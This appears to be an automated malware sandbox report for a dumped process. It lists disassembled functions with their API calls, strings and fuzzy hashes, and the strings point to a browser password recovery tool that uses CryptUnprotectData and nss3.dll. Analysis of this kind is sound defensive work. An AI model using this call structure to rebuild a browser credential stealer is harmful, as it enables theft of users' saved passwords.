                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AttributesFilefreememset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2507021081-0
                                                                                                                                                                        • Opcode ID: 589a6b9333c77986f3b6355c6ce351534fc2f1959dd785c0c1c88223f13a717d
                                                                                                                                                                        • Instruction ID: b8dc40b53dc963fdbe0ae3b1e60dcad109612476599bdcfb1117a2ceff08efc0
                                                                                                                                                                        • Opcode Fuzzy Hash: 589a6b9333c77986f3b6355c6ce351534fc2f1959dd785c0c1c88223f13a717d
                                                                                                                                                                        • Instruction Fuzzy Hash: 0811B73690C1159B9B109F649CC15EF7278DB49354B21013BF912A2281D63C9D82D2AD
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040EF2B Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 78COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040EF4D
                                                                                                                                                                          • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
                                                                                                                                                                          • Part of subcall function 0040B301: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
                                                                                                                                                                          • Part of subcall function 0040B301: memcpy.MSVCRT ref: 0040B419
                                                                                                                                                                          • Part of subcall function 0040B301: wcscpy.MSVCRT ref: 0040B382
                                                                                                                                                                          • Part of subcall function 0040B301: wcslen.MSVCRT ref: 0040B3A0
                                                                                                                                                                          • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE
                                                                                                                                                                          • Part of subcall function 00408AE8: memset.MSVCRT ref: 00408B09
                                                                                                                                                                          • Part of subcall function 00408AE8: _snwprintf.MSVCRT ref: 00408B3C
                                                                                                                                                                          • Part of subcall function 00408AE8: wcslen.MSVCRT ref: 00408B48
                                                                                                                                                                          • Part of subcall function 00408AE8: memcpy.MSVCRT ref: 00408B60
                                                                                                                                                                          • Part of subcall function 00408AE8: wcslen.MSVCRT ref: 00408B6E
                                                                                                                                                                          • Part of subcall function 00408AE8: memcpy.MSVCRT ref: 00408B81
                                                                                                                                                                          • Part of subcall function 00408907: GetSaveFileNameW.COMDLG32(?), ref: 00408956
                                                                                                                                                                          • Part of subcall function 00408907: wcscpy.MSVCRT ref: 0040896D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                                                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                        • API String ID: 1392923015-3614832568
                                                                                                                                                                        • Opcode ID: e098a2b6de55531eea522cb88dcf061458ab68b85293c38f111b81194adb8019
                                                                                                                                                                        • Instruction ID: 893d8713e26b77edc4206c052df4fc7d3163be0104e9675467069f1f0f0c5c5e
                                                                                                                                                                        • Opcode Fuzzy Hash: e098a2b6de55531eea522cb88dcf061458ab68b85293c38f111b81194adb8019
                                                                                                                                                                        • Instruction Fuzzy Hash: 963150B1D006199FDB10EF96D8856DD7BB4FF04318F20417BF908B7281EB786A458B98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00416E10 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • AreFileApisANSI.KERNEL32 ref: 00416E17
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00416E35
                                                                                                                                                                        • malloc.MSVCRT ref: 00416E3F
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00416E56
                                                                                                                                                                        • free.MSVCRT(?), ref: 00416E5F
                                                                                                                                                                        • free.MSVCRT(?,?), ref: 00416E7D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4131324427-0
                                                                                                                                                                        • Opcode ID: ef1d8c4a491119e611ed89199fe48a787826ffdbe5a65be19b588c9cf178c72a
                                                                                                                                                                        • Instruction ID: 8f18c9831eb1c79f14fd8e789aed1b74bdecd3d50ffb4352c5f07f5f59d31971
                                                                                                                                                                        • Opcode Fuzzy Hash: ef1d8c4a491119e611ed89199fe48a787826ffdbe5a65be19b588c9cf178c72a
                                                                                                                                                                        • Instruction Fuzzy Hash: 4901FC7A504221BBAB215B75EC01EEF36DCDF457B07220326FC14E7290DA28DD4145EC
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00414CCE Relevance: 9.0, APIs: 2, Strings: 4, Instructions: 21COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                        • String ID: NA$LMA$MMA$MMA
                                                                                                                                                                        • API String ID: 3510742995-965156261
                                                                                                                                                                        • Opcode ID: 55ac8c502bd4826d858cd5ef6fc5d691ccd3d3d57d4c1cb0b8c1e43a78ebe62b
                                                                                                                                                                        • Instruction ID: 8582fd1753a63c193c8d59700b7b4d4e45a0e47666d49b47a36a18adf3e061cc
                                                                                                                                                                        • Opcode Fuzzy Hash: 55ac8c502bd4826d858cd5ef6fc5d691ccd3d3d57d4c1cb0b8c1e43a78ebe62b
                                                                                                                                                                        • Instruction Fuzzy Hash: DBE09A30940350DAE360A744DC82F823294A742B26F11843BE508229E3C3FC98C88BAD
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00417AB2 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTempPathW.KERNEL32(000000E6,?,?,0041767E), ref: 00417AF6
                                                                                                                                                                        • GetTempPathA.KERNEL32(000000E6,?,?,0041767E), ref: 00417B1E
                                                                                                                                                                        • free.MSVCRT(00000000,0044C838,00000000), ref: 00417B46
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PathTemp$free
                                                                                                                                                                        • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                        • API String ID: 924794160-1420421710
                                                                                                                                                                        • Opcode ID: ef23db0a414d9dcf011a3825053a170985a18b01ba0b77813df6364c9434a8ca
                                                                                                                                                                        • Instruction ID: 98cb418060ea171a52ad1c8f6cb6bf58db0dc7ae7347cd78cc57f1029aea62d9
                                                                                                                                                                        • Opcode Fuzzy Hash: ef23db0a414d9dcf011a3825053a170985a18b01ba0b77813df6364c9434a8ca
                                                                                                                                                                        • Instruction Fuzzy Hash: F8314B3160C2595AE730A7659C41BFB73AD9F6434CF2404AFE481C2182EF6CEEC58A5D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040D5DA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040D611
                                                                                                                                                                          • Part of subcall function 004147A8: memcpy.MSVCRT ref: 00414825
                                                                                                                                                                          • Part of subcall function 0040CDFA: wcscpy.MSVCRT ref: 0040CDFF
                                                                                                                                                                          • Part of subcall function 0040CDFA: _wcslwr.MSVCRT ref: 0040CE3A
                                                                                                                                                                        • _snwprintf.MSVCRT ref: 0040D65B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                        • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                        • API String ID: 1775345501-2769808009
                                                                                                                                                                        • Opcode ID: bd6149e99cc7a28de9a93ba740ac90c598832ca3e2003f992b14148a88f33169
                                                                                                                                                                        • Instruction ID: be7e472b8ae12577d0ef69e4d5a2bd87498dbd4f23eec6cc8c98af6d964d1ad5
                                                                                                                                                                        • Opcode Fuzzy Hash: bd6149e99cc7a28de9a93ba740ac90c598832ca3e2003f992b14148a88f33169
                                                                                                                                                                        • Instruction Fuzzy Hash: 3E11C13160031ABBEB11AB65CCC6E997B25FF08708F100026F809676A2C739F961DBC9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040F2F9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040F329
                                                                                                                                                                          • Part of subcall function 00408282: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040BE8F,00000000,0040BD42,?,00000000,00000208,?), ref: 0040828D
                                                                                                                                                                        • wcsrchr.MSVCRT ref: 0040F343
                                                                                                                                                                        • wcscat.MSVCRT ref: 0040F35F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                        • String ID: .cfg$General
                                                                                                                                                                        • API String ID: 776488737-1188829934
                                                                                                                                                                        • Opcode ID: 3c04ec66949ca4b58d7f719b2f0ee793d98d67a51e79d319996db7eeb5c734b3
                                                                                                                                                                        • Instruction ID: 56bea33938f28168157b0b8bcc93b38caa6b0521648f49714e8bc2d05d89a73e
                                                                                                                                                                        • Opcode Fuzzy Hash: 3c04ec66949ca4b58d7f719b2f0ee793d98d67a51e79d319996db7eeb5c734b3
                                                                                                                                                                        • Instruction Fuzzy Hash: 831186769013289ADF20EF55CC85ACE7378FF48754F1041FBE508A7142DB789A858B99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040FBD2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 0040FBF3
                                                                                                                                                                        • RegisterClassW.USER32 ref: 0040FC18
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040FC1F
                                                                                                                                                                        • CreateWindowExW.USER32 ref: 0040FC3E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                        • String ID: WebBrowserPassView
                                                                                                                                                                        • API String ID: 2678498856-2171583229
                                                                                                                                                                        • Opcode ID: 83b8f8d6c3154c4bdd4fc1cc3252cc631093d3cfb7f7179f48de14d9357ef2dd
                                                                                                                                                                        • Instruction ID: f352fd5291e0f9f707763c8e0c0f79a6b8b327092a808c719acfd4fe52221a97
                                                                                                                                                                        • Opcode Fuzzy Hash: 83b8f8d6c3154c4bdd4fc1cc3252cc631093d3cfb7f7179f48de14d9357ef2dd
                                                                                                                                                                        • Instruction Fuzzy Hash: 6E01C4B1D02629ABDB01DF998C89ADFBEBCFF09750F108116F514E6241D7B45A408BE9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00403BB9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004027E9,?,00000090,00000000,?), ref: 00403BC8
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403BDA
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00403BFD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                        • String ID: CryptUnprotectData$crypt32.dll
                                                                                                                                                                        • API String ID: 145871493-1827663648
                                                                                                                                                                        • Opcode ID: 5a4a0124d32878fe9075046ef856c222503c42c3ca474c9d5839c12a83985592
                                                                                                                                                                        • Instruction ID: 6d08c6472c4a7eef0e99d7de69836aa1542f25023555ecd08c966f49be56efdf
                                                                                                                                                                        • Opcode Fuzzy Hash: 5a4a0124d32878fe9075046ef856c222503c42c3ca474c9d5839c12a83985592
                                                                                                                                                                        • Instruction Fuzzy Hash: B3012C36508A419BDB318F168D4881BFEF9EFE1741B25482EE0C6E2261D7799980CB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0041409A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • wcscpy.MSVCRT ref: 004140A9
                                                                                                                                                                        • wcscpy.MSVCRT ref: 004140C4
                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000,0040F398,00000000,?,0040F398,?,General,?), ref: 004140EB
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000001), ref: 004140F2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                        • String ID: General
                                                                                                                                                                        • API String ID: 999786162-26480598
                                                                                                                                                                        • Opcode ID: b82796398bdfff255fd1f18aa51d55e941ea69e93fc42597b2932e96296840f9
                                                                                                                                                                        • Instruction ID: 886da17c1b1bf2e9de85dc8b7e1e57be2bc6bdc909f117fec59c49a827307fb5
                                                                                                                                                                        • Opcode Fuzzy Hash: b82796398bdfff255fd1f18aa51d55e941ea69e93fc42597b2932e96296840f9
                                                                                                                                                                        • Instruction Fuzzy Hash: 6BF059B3408701AFF7209B919C85E9B7BDCEB98318F11842FF21991011DB384C4486A9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00407DF4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,0040DEA5,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000,00000000), ref: 00407E08
                                                                                                                                                                        • _snwprintf.MSVCRT ref: 00407E35
                                                                                                                                                                        • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00407E4E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                        • String ID: Error$Error %d: %s
                                                                                                                                                                        • API String ID: 313946961-1552265934
                                                                                                                                                                        • Opcode ID: a75c3089e7e966da0bd638cb6b9ab9d800269499d53a23e07f81a9ce3fd34d46
                                                                                                                                                                        • Instruction ID: b00963ac5392a62de3320d989648915026267cceceb2d36b0a398715d1e41bd5
                                                                                                                                                                        • Opcode Fuzzy Hash: a75c3089e7e966da0bd638cb6b9ab9d800269499d53a23e07f81a9ce3fd34d46
                                                                                                                                                                        • Instruction Fuzzy Hash: B9F0A77694060867EF11A794CC06FDA73ACBB84791F1400BBF945E2181DAB8EA854A69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0041473D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryW.KERNEL32(shlwapi.dll,745D48C0,?,00404C4C,00000000), ref: 00414746
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00414754
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00404C4C,00000000), ref: 0041476C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                        • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                        • API String ID: 145871493-1506664499
                                                                                                                                                                        • Opcode ID: 86042acc96e33f1a31b74afa18de2a5d13a01f1e05fbb0343d8f5c10d07cce3a
                                                                                                                                                                        • Instruction ID: 374e307410260eae357c848a0ac8b8d2ed108e4990ae0ebeecf0dac054c84ad8
                                                                                                                                                                        • Opcode Fuzzy Hash: 86042acc96e33f1a31b74afa18de2a5d13a01f1e05fbb0343d8f5c10d07cce3a
                                                                                                                                                                        • Instruction Fuzzy Hash: B1D05B397005206BEA5167366C48FEF3A55EFC7B517154031F910D2261DB648C0285AD
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004351F7 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 390COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                        • API String ID: 0-1953309616
                                                                                                                                                                        • Opcode ID: e023502b744750f4b23ffe04e2ae5b216edfebde367b4abfa2077d4614065f4c
                                                                                                                                                                        • Instruction ID: aa3871157cb2c29edb2d7db9a5a62b5d9e1ddd85e1ada7e098d24c65e5f6a169
                                                                                                                                                                        • Opcode Fuzzy Hash: e023502b744750f4b23ffe04e2ae5b216edfebde367b4abfa2077d4614065f4c
                                                                                                                                                                        • Instruction Fuzzy Hash: 60E1BF71E00209EFDB14DFA5D981AAEBBB5FF48304F10806AE805AB341DB78AD51CB95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00430EBE Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 230COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • unknown column "%s" in foreign key definition, xrefs: 004310A5
                                                                                                                                                                        • foreign key on %s should reference only one column of table %T, xrefs: 00430F1A
                                                                                                                                                                        • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430F42
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                        • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                        • API String ID: 3510742995-272990098
                                                                                                                                                                        • Opcode ID: a27afdf262ea2b2f13aa3d7c6496d52117a55a242e1c635bc0b46c3f4d569d41
                                                                                                                                                                        • Instruction ID: b4e089481029338f932d4991b26cccaedb5970869045d73953a00dcfe725fe6b
                                                                                                                                                                        • Opcode Fuzzy Hash: a27afdf262ea2b2f13aa3d7c6496d52117a55a242e1c635bc0b46c3f4d569d41
                                                                                                                                                                        • Instruction Fuzzy Hash: 10914B75A00209DFCB24DF59C480A9EBBF1FF48304F15819AE809AB312D739E942CF99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00406A86 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memsetwcslen$wcscatwcscpy
                                                                                                                                                                        • String ID: nss3.dll
                                                                                                                                                                        • API String ID: 1250441359-2492180550
                                                                                                                                                                        • Opcode ID: 09e33b56ee97e3876529d6a1dbd088a7e67531a27dd58c4da1fdcc6a23c597f8
                                                                                                                                                                        • Instruction ID: 1e34d79d1f5922d0320f8d763ab64a9784b47cc615ba08cf08abcfcfe76fb249
                                                                                                                                                                        • Opcode Fuzzy Hash: 09e33b56ee97e3876529d6a1dbd088a7e67531a27dd58c4da1fdcc6a23c597f8
                                                                                                                                                                        • Instruction Fuzzy Hash: D511ECF290121D96EB10EB60DD49BC673BC9B15314F1004BBE60DF21C1FB79DA548A5D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040C181 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C127
                                                                                                                                                                          • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C135
                                                                                                                                                                          • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C146
                                                                                                                                                                          • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C15D
                                                                                                                                                                          • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C166
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040C19C
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040C1AF
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040C1C2
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040C1D5
                                                                                                                                                                        • free.MSVCRT(00000000), ref: 0040C20E
                                                                                                                                                                          • Part of subcall function 00408F1E: free.MSVCRT(00000000,004092A3,00000000,?,00000000), ref: 00408F25
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??3@$free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2241099983-0
                                                                                                                                                                        • Opcode ID: b651c62b607cea7bb0db53ebb6174c0f1cadef425dc2d358b3fe847b53385816
                                                                                                                                                                        • Instruction ID: 1b724bf31a54a7cffb96c88967fdb5b0379f9a1dee2f65518d31c165403446cb
                                                                                                                                                                        • Opcode Fuzzy Hash: b651c62b607cea7bb0db53ebb6174c0f1cadef425dc2d358b3fe847b53385816
                                                                                                                                                                        • Instruction Fuzzy Hash: 6E01E532905A31D7D6257B7AA68151FB396BEC2710316026FF845BB2C38F3C6C414ADD
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00416DAA Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • AreFileApisANSI.KERNEL32 ref: 00416DB2
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00416DD2
                                                                                                                                                                        • malloc.MSVCRT ref: 00416DD8
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00416DF6
                                                                                                                                                                        • free.MSVCRT(?), ref: 00416DFF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4053608372-0
                                                                                                                                                                        • Opcode ID: 8b75c47431a11f52c87324c6af9dbd18f9e3b72bc027a16140cc791be9c4b708
                                                                                                                                                                        • Instruction ID: 7c4f126962bd8a7e2ff3a65b0fa2dbedc4b8b396d66bab6395f0ad674673df12
                                                                                                                                                                        • Opcode Fuzzy Hash: 8b75c47431a11f52c87324c6af9dbd18f9e3b72bc027a16140cc791be9c4b708
                                                                                                                                                                        • Instruction Fuzzy Hash: B501C8B550411DBF7F115FA5ECC1CFF7AACEA453E8721032AF414E2190D6348E405AB8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040B60E Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetParent.USER32(?), ref: 0040B620
